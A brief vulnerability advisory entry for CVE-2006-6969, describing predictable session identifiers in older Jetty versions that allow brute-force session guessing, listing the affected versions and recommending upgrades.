CVE-2006-6969

Name of the Vulnerable Software and Affected Versions Jetty versions prior to 4.2.27 Jetty versions 5.1 prior to 5.1.12 Jetty versions 6.0 prior to 6.0.2 Jetty versions 6.1 prior to 6.1.0pre3

Description The issue allows remote attackers to guess a session identifier through brute force attacks due to the generation of predictable session identifiers using java.util.random. This can lead to bypassing authentication requirements and possibly conducting cross-site request forgery attacks.

Recommendations For Jetty versions prior to 4.2.27, update to version 4.2.27 or later. For Jetty versions 5.1 prior to 5.1.12, update to version 5.1.12 or later. For Jetty versions 6.0 prior to 6.0.2, update to version 6.0.2 or later. For Jetty versions 6.1 prior to 6.1.0pre3, update to version 6.1.0pre3 or later.